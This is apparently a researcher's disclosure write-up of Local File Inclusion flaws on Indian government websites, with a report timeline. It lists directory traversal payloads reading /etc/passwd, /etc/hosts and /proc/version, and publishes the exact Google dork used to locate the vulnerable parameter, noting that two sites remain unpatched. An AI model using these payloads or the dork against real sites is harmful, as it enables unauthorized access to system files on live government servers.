LFI Spree

Vulnerability	LFI (Local file inclusion)
Description	The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a “dynamic file inclusion” mechanisms implemented in the target application. The vulnerability occurs due to the use of user-supplied input without proper validation.
Impact	LFI can lead to the disclosure of critical information or even remote code execution.
Owasp test ID	OTG-INPVAL-013

In March, during a security assessment of a government website, I identified five instances of Local File Inclusion (LFI) vulnerabilities using a custom Google dork. The exploitation was straightforward. While probing for injection points, I discovered a parameter named fileName=. By appending directory traversal sequences such as ../, I was able to access internal directories and successfully retrieve the contents of sensitive files.

    ../../../../etc/passwd ---> has all registered users that have access to a system
    ../../../../etc/issue ---> contains a message or system identification to be printed before the login prompt.  
    ../../../../etc/hosts ---> a local, plain-text file on a computer used to manually map IP addresses to hostnames
    ../../../../etc/issue ---> contains a message or system identification to be printed before the login prompt.
    ../../../../etc/passwd ---> has all registered users that have access to a system
    ../../../../proc/version ---> specifies the version of the Linux kernel
    and many more...

But I got fail when tried to convert this vulnerability into RCE.

Created one google dork to find out the same entrypoints in different domains and I got around 10-15 different websites in search result. Tried to exploit the same files and five domains were vulnerable to LFI (still two websites are not patched).

Report timeline

1-March-2024 –> Reported five vulnerabilities to the stakeholder
2-March-2024 –> Stakeholder acknowledged the issue
10-March-2024 –> Three vulnerabilities patched

Google Dork: Previewpage.do?filename= site:gov.in